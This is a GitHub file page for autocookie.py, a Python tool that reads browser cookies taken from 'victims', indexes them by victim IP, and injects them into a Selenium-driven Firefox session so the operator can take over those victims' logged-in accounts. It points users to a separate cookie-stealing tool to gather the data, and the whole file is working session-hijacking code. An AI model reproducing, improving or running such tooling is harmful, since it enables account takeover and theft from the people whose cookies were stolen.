-
Notifications
You must be signed in to change notification settings - Fork 1
/
autocookie.py
181 lines (150 loc) · 5.41 KB
/
autocookie.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
from _modules.classes import Prison, Victim, CookieJar, Cookie
import json
import os
import time
import socket
import selenium
import tldextract
from selenium import webdriver
from webdriver_manager.firefox import GeckoDriverManager
def verify_selection(selection, sessions):
if is_int(selection) and selection != "s":
if selection in sessions:
return True
return False
def load_selection_screen(sessions, victim):
os.system("cls")
sessions_available = [number for (number, _) in victim.items()]
print(f"[i] {sessions} sessions detected.")
print(f"[i] Sessions available: {sessions_available}")
question = f"Which one to load? (s to skip): "
selection = input(question)
while not verify_selection(selection, sessions_available):
print("[-] Couldn't find that, try again")
selection = input(question)
return selection
def load_cookies(victim, driver: webdriver.Firefox):
sessions = len(victim)
selection = next(iter(victim.keys()))
if sessions > 1:
selection = load_selection_screen(sessions, victim)
if selection == "s":
print("[+] Skipping...")
return False
for domain in victim[selection]:
for cookie in domain:
cookie_obj = {
"name": cookie.name,
"value": cookie.value,
"domain": cookie.domain
}
driver.add_cookie(cookie_obj)
print("[+] Cookies loaded successfully")
def populate_cookies(cookies):
cookie_list = []
for (_, cookiejar) in cookies.items():
for cookie in cookiejar:
cookie_list.append(Cookie(
cookie["name"], cookie["value"], cookie["domain"]))
return cookie_list
def populate_victim(cookie_files, directory, victim):
victim_obj = Victim(victim)
for cookie_file in cookie_files:
if "cookies" in cookie_file:
session_number = cookie_file[7:-5]
with open(f"{directory}/{victim}/{cookie_file}") as f:
cookies = json.load(f)
cookie_list = populate_cookies(cookies)
cookie_jar = CookieJar(cookie_list)
victim_obj.update_cookies(cookie_jar, session_number)
return victim_obj
def get_cookies(prison, directory="data"):
if not os.path.exists(directory):
print(
"[-] No data detected. Please use ChromePass and place the Data folder here.")
print("[i] ChromePass link: https://github.com/darkarp/chromepass")
return False
_, victims, _ = next(os.walk(directory))
for victim in victims:
_, _, cookie_files = next(os.walk(f"{directory}/{victim}"))
victim_obj = populate_victim(cookie_files, directory, victim)
prison.add_victim(victim_obj)
prison._save_db()
print("[+] Database updated successfully...")
return True
def is_ip(selection):
print(selection, "here")
try:
socket.gethostbyname(selection)
return True
except socket.gaierror:
return False
def is_int(number):
try:
int(number)
return True
except ValueError:
return False
def victim_verify(victims, selection):
for (index, ip) in victims.items():
if selection in [index, ip]:
return ip
return False
def show_selection(victims):
print("\nVictim list:")
for (index, ip) in victims.items():
print(f"{index}: {ip}")
print("\n")
selection = input("Who do you want to load? (number or ip, s to skip): ")
if selection == "s":
return False
return selection
def selection_screen(victims, url):
os.system("cls")
victim_ips = {str(index): ip for (index, ip) in enumerate(victims)}
print(
f"[+] Found {len(victims)} victim(s) with cookies for the website: {url}")
selection = show_selection(victim_ips)
victim = victim_verify(victim_ips, selection)
while not victim and selection:
print("Couldn't find a record... Try again.")
selection = show_selection(victim_ips)
victim = victim_verify(victim_ips, selection)
if selection:
print(f"[+] Selection verified for: {victim}")
print(f"[+] Loading Cookies")
return victim
else:
print("[+] Skipping...")
return False
def run_browser_interactive(database):
print("[+] Checking for browser installation")
driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())
print(f"[+] Loading Browser...")
driver.get("https://www.google.com")
print("[+] Done")
while True:
url = driver.current_url
domains = []
subdomain, domain, suffix = tldextract.extract(url)
full_url = f"{subdomain}.{domain}.{suffix}"
domains.append(full_url)
if subdomain:
domains.append(f".{domain}.{suffix}")
victims = database.from_domains(domains)
if victims:
victim = selection_screen(victims, url)
while victim:
load_cookies(victims[victim], driver)
driver.get(url)
victim = selection_screen(victims, url)
else:
print(f"[-] Found 0 victims for the website: {url}")
time.sleep(1)
def run_browser_url(database, url):
print("[-] To be implemented")
if __name__ == "__main__":
print("[!] Warning: This is still a very early stage proof of concept...")
database = Prison()
if get_cookies(database):
run_browser_interactive(database)